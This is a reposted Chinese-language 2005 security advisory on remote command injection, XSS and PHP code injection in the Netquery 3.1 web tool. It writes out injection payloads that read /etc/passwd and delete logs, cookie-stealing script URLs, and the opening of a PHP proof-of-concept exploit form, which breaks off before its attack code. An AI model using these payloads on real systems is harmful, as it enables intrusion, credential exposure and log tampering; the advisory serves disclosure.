Netquery多个远程安全漏洞

发布日期：2005-08-02
更新日期：2005-08-02

受影响系统：

Netquery Netquery 3.1

描述：

---

BUGTRAQ ID: 14373

Netquery是一款基于WEB的网络命令工具应用程序。

Netquery中存在多个远程漏洞，远程攻击者可以在主机上执行任意命令。

用户可以通过PING面板“Ping IP Address or Host Name”输入文本框中使用管道字符在目标系统上执行任意命令：

| cat /etc/passwd

然后就可以看到明文口令文件：

| pwd

看到当前路径：

| rm [pwd_output]/logs/nq_log.txt

用户可以通过URL浏览文本日志文件：

http://[target]/[path]/logs/nq_log.txt

xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>

用户还可以使用在线Netquery安装从HTTP GET请求面板发动攻击：

http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat /etc/passwd

<*来源：rgod （rgod@autistici.org）

链接：http://www.packetstormsecurity.org/0507-exploits/netquery31.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
//NETQUERY 3.1 remote commands execution
//by rgod
//http://rgod.altervista.org
//a lot of code for a pipe vulnerability...
//I wrote this to replace that bad perl code swowned in securityfocus...
//run it from your browser...
//make these changes in php.ini if you have troubles
//with this script
//
//allow_call_time_pass_reference = on
//register_globals = On


error_reporting(0);
echo '<head><title>Netquery 3.1 remote commands execution poc exploit by rgod</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {color: #00FF00;}
body {background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;
font-weight: bold;
font-style: italic;
}
-->
</style></head>
<body>
<p class="Stile6">2.19 01/08/2005</p>
<p class="Stile6">Netquery 3.1 remote commands execution poc exploit by rgod</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<p class="Stile6">read this paper about <a href="http://www.rgod.altervista.org/netquery.html" target="_blank">Netquery vulnerability</a></p>
<table width="84%" >
<tr>
<td width="43%">
<form name="form1" method="post" action="'.$PHP_SELF.'?path=value&host=value&port=value&command=value&proxy=value">
<p>
<input type="text" name="host">
<span class="Stile5">hostname (ex: www.sitename.com) </span></p>
<p>
<input type="text" name="path">
<span class="Stile5">path (ex: /netquery/ or just /) </span></p>
<p>
<input type="text" name="port">
<span class="Stile5">specify a port other than 80 (default value) </span></p>
<p>
<input type="text" name="proxy">
<span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有